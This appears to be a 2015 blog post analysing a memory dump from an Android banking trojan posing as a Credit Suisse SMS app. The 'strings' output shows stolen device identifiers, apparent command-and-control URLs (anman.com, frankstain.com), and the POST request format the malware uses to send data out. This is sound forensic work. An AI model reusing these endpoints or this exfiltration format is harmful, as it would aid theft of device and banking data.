Thursday, October 15, 2015

Android Memory Analysis (III) - Analyzing the data

In last post I extracted the important memory blocks assigned to the suspicious process. Now, I will check the content of those blocks.

The first approach I will use is to run the UNIX command 'strings' against the file 'task.17145.0x12e01000.vma' and see if there are something interesting.



Extracting data with 'strings'


$ strings task.17145.0x12e01000.vma | more


AppName=CreditSuisse SmsSecurity;
Version=3.8;
DefaultApp=Yes;
Admin=No;
SimState=READY;
SimCountryCode=ch;
SimOperatorCode=22854;
SimOperatorName=Lycamobile;
SimSerialNumber=*******************
PhoneNumber=;
DeviceIMEI=************
SubscriberId=*******
NETWORK=wifi;
BRAND=google;
FINGERPRINT=google/hammerhead/hammerhead:5.1.1/LMY48I/2074855:user/release-keys;
MANUFACTURER=LGE;
MODEL=Nexus 5;
PRODUCT=hammerhead;
OS_Info=os.name: Linux | os.arch: armv7l | os.version: 3.4.0-g5170b88 | java.vendor: The Android Project | java.version: 0
QXBwTmFtZT1DcmVkaXRTdWlzc2UgU21zU2VjdXJpdHk7ClZlcnNpb249My44Owo7CkRlZmF1bHRBcHA9WWVzOwpBZG1pbj1ObzsKU2ltU3RhdGU9UkVBRFk7ClNpbUNvdW50cnlDb2RlPWNoOwpTaW1PcGVyYXRvckNvZGU9MjI4NTQ7ClNpbU9wZXJhdG9yTmFtZT1MeWNhbW9iaWxlOwpTaW1TZXJpY***********************xMDAyODU4MDgyMDsKUGhvbmVOdW1iZXI9OwpEZXZpY2VJTUVJPTM1ODI0MDA1MTkzMjU2NDsKU3Vic2NyaWJlcklkPTIyODU0MDAwMjg1ODA4MjsKTkVUV09SSz13aWZpOwpCUkFORD1nb29nbGU7CkZJTkdFUlBSSU5UPWdvb2dsZS9oYW1tZX*****************lcmhlYWQ6NS4xLjEvTE1ZNDhJLzIwNzQ4NTU6dXNlci9yZWxlYXNlLWtleXM7Ck1BTlVGQUNUVVJFUj1MR0U7Ck1PREVMPU5leHVzIDU7ClBST0RVQ1Q9aGFtbWVyaGVhZDsKT1NfSW5mbz1vcy5uYW1lOiBMaW51eCB8IG9zLmFyY2g6IGFybXY3bCB8IG9zLnZlcnNpb246IDMuNC4wLWc1MTcwYjg4IHwgamF2YS52ZW5k
b3I6IFRoZSBBbmRyb2lkIFByb2plY3QgfCBqYXZhLnZlcnNpb246IDA=



a:4:{s:6:"device";s:750:"QXBwTmFtZT1DcmVkaXRTdWlzc2UgU21zU2VjdXJpdHk7ClZlcnNpb249My44Owo7CkRlZmF1bHRB
cHA9WWVzOwpBZG1pbj1ObzsKU2ltU3RhdGU9UkVBRFk7ClNpbUNvdW50cnlDb2RlPWNoOwpTaW1P
cGVyYXRvckNvZGU9MjI4NTQ7ClNpbU9wZXJhdG9yTmFtZT1MeWNhbW9iaWxlOwpTaW1TZXJpYWxO
dW1iZXI9ODk0MTU0MDAxMDAyODU4MDgyMDsKUGhvbmVOdW1iZXI9OwpEZXZpY2VJTUVJPTM1ODI0
MDA1MTkzMjU2NDsKU3Vic2NyaWJlcklkPTIyODU0MDAwMjg1ODA4MjsKTkVUV09SSz13aWZpOwpC
UkFORD1nb29nbGU7CkZJTkdFUlBSSU5UPWdvb2dsZS9oYW1tZXJoZWFkL2hhbW1lcmhlYWQ6NS4x
LjEvTE1ZNDhJLzIwNzQ4NTU6dXNlci9yZWxlYXNlLWtleXM7Ck1BTlVGQUNUVVJFUj1MR0U7Ck1P
REVMPU5leHVzIDU7ClBST0RVQ1Q9aGFtbWVyaGVhZDsKT1NfSW5mbz1vcy5uYW1lOiBMaW51eCB8
IG9zLmFyY2g6IGFybXY3bCB8IG9zLnZlcnNpb246IDMuNC4wLWc1MTcwYjg4IHwgamF2YS52ZW5k
b3I6IFRoZSBBbmRyb2lkIFByb2plY3QgfCBqYXZhLnZlcnNpb246IDA=

";s:3:"cmd";s:3:"log";s:3:"rid";s:2:"25";s:4:"data";s:69:"a:2:{s:7:"LogCode";s:4:"PASS";s:7:"LogText";s:16:"Rand code: 67302";}";}



<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="Pref5"></string>
    <int name="PASSADDED" value="67302" />
    <int name="DEL" value="0" />
    <string name="Num5"></string>
    <string name="filters"></string>
    <string name="Num10"></string>
    <int name="RID" value="25" />
    <string name="PHONE_NUMBER"></string>
    <int name="FIRST_ACTIVITY" value="1" />
    <int name="RTB" value="0" />
    <string name="IMEI">***********</string>
    <string name="Pref10"></string>
    <string name="USE_URL_MAIN">http://anman.com/img/main.php</string>
    <string name="Pref3"></string>
    <string name="URL_MAIN">http://anman.com/img/main.php;http://frankstain.com/allrent/om/main.php</string>
    <string name="Pref1"></string>
    <string name="Num1"></string>
    <string name="Num3"></string>

</map>






NfvnkjlnvkjKCNXKDKLFHSKD:LJmdklsXKLNDS:<XObcniuaebkjxbcz$


Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0



a:2:{s:7:"LogCode";s:4:"PASS";s:7:"LogText";s:16:"Rand code: 67302";}
!(Ew

T)J("

4e66766e6b6a6c6e766b6a4b434e584b444b4c4648534b443a


12345678
12345678
'PV<
User-agent
Content-Type
Pragma
no-cache
anman.com
Connection
Keep-Alive
Accept-Encoding
Content-Length

i=McsZtRV7Bv7ZjMSzwk5...A%2FFIjkPOweOoHRvNnv%2By5XF4B216Rozw%0A&s=&
POST /img/main.php HTTP/1.1
application/x-www-form-urlencoded; charset=UTF-8
,pppAp
,ppR)p
,pppAp
,ppR)p@


HTTP/1.1 500 Internal Server Error
Date: Sat, 05 Sep 2015 17:53:11 GMT
Server: Apache PHP/5.2.9 with Suhosin-Patch
X-Powered-By: PHP/5.5.28-1~dotdeb+7.1
Connection: close
Set-Cookie: PHPSESSID=4ui04g3eo19adndud5n42a4i03; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
kmHMeE8q6Ov9atedif800UTMtbHK%0AMy3kAD9ZmuC3yOejMJ1%2BGRDc%2F057x8d7zPCEorf87Gj6BH7oXMXikrQlgobvfVkTPuSHJ8b47lxk%0Ad3xI8PQP5vbLDoyDp0vAyfmxNTGjUF%2
Fvwg1MIgCBMnYg6O5GGJSxXzjP14%2BAExvGsOXy%2BIpj%2FhpD%0AAZNkycp%2BshcbF%2FTXVJmEd1BD2%2FBQU3LwuUzK4%2B98%2FWPbGY0m2jK7BktB5kJmdCoYIn0bM7SG%2FPxs%0A
vPlXYKFjEBO4KfMwyQygUsi2aT%2FZbiPfdo3AnGD3d6ewRTsB%2F8XHRO4R3nsspzZ7AjDKB%2FjeW7rC%0ASD%2BKuRZaUrrmXckwLbssneu6OkeQTdLliwLzweIfWHpyMa5jCZ3rfZ1teGs
3eNlr1V91h%2FGxjygz%0A8JxLwNLUin0ZW9axolXA6TG7WuzAiz5VVBiXEF7pZO2SPbJA6vSjmPqU8mWYO4vv%2FQ103LVBK3YY%0AlztTLbDvgINwm%2B%2FKPw7UGgo1Ua3eJdMwTIJer7X
nzHLeucS7kccI5UHX2n2lzBNA35%2BleqIME3%2Fe%0A4NNG2vVREhQXamdhCToLOAXE5Sg%2Btkh5otiNh9kTkbbyKFqqcTNS6U5ZWPNTwZrvJ7gLQhwpBeEk%0Afp1DTlhIs2QAimwdBk8l1
tAq%2BHEHhWY7X58iFdT%2Ffx9%2FdNJnnO5hyWMQtZkJLG0L7oc0nl3%2BDvN6%0AbNXksJ8%2Bij4tMbKeNCru0GQ%2BnLee5OJl4wzf8PrFAt7p0Uc2lx2FLnBSOImQAjxacbId78bHf5Fv
%0Ae2cAkq5zCiR45N6A21ew%2BJNOCG6wsafA0%2Fwhvvl0LARuG8%2FTfWSuiJFmMN6UifkTKGwEc9B7tbc8%0AOsvDqsdZPSgbI32HqwTWIQb1Q4gIdyNobbKdntEma8hD9bBguQjxbgMkaI
lSDfWj5sVW1ssoeuFR%0ALVfzxi4oNnEUmgQ6dlNXKRPwumRBiArE6lpNrvV2oT%2FFuUfyodAwHuZF3%2FPxivNahri6Q%2FfyJ6w5%0AmpITS6x5gv4UzW3HnqQ1NEWp8qys8md9gwh%2B4v
oxiNbsaRW6rSTWdtDHN6mg4%2BRLpMn5ZNd2AxUc%0A&s=&



a:2:{s:7:"LogCode";s:5:"START";s:7:"LogText";s:15:"Service started";}
T)J("
hy"p
4e66766e6b6a6c6e766b6a4b434e584b444b4c4648534b443a
4e66766e6b6a6c6e766b6a4b434e584b444b4c4648534b443a
4e66766e6b6a6c6e766b6a4b434e584b444b4c4648534b443a
4e66766e6b6a6c6e766b6a4b434e584b444b4c4648534b443a
application/x-www-form-urlencoded; charset=UTF-8
,pppAp

,ppR)p








Basically, we can see in clear text some evidence. For example, it is possible the HTTP communication (commands): URL, user-agent, POST content, and some other stuff which looks like C&C commands. Also there is a very interesting string: 

"4e66766e6b6a6c6e766b6a4b434e584b444b4c4648534b443a".



Using and HEX editor to analyse the memory dump

Another approach is to use an HEX, like 'hexedit' in UNIX or MacOSX. 

$ hexedit task.17145.0x12e01000.vma






As we can see the same information can be seen with both methods. 

During the next post I will start investigating what information can be gather from the evidence found.